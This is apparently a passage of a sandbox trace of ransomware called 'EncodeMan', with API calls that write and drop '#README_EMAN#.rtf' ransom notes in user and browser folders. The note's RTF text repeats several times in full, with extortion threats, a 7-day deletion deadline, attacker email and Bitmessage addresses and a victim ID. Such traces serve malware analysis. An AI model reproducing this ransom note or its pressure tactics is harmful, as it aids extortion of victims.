;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235c8a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¦}x|¨?Ú¼\x99,¼øûÙÜ#ºP©ª|MÈ£\x8e\x01", lpUsedDefaultChar=0x0) returned 8717 [0283.696] WriteFile (in: hFile=0x2cc, lpBuffer=0x235c8a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235c8a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.697] CloseHandle (hObject=0x2cc) returned 1 [0283.697] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\#readme_eman#.rtf")) returned 0x20 [0283.697] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf")) returned 0x20 [0283.697] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\#readme_eman#.rtf")) returned 0x20 [0283.697] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\#readme_eman#.rtf")) returned 0x20 [0283.697] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#readme_eman#.rtf")) returned 0x20 [0283.697] GetFileAttributesW 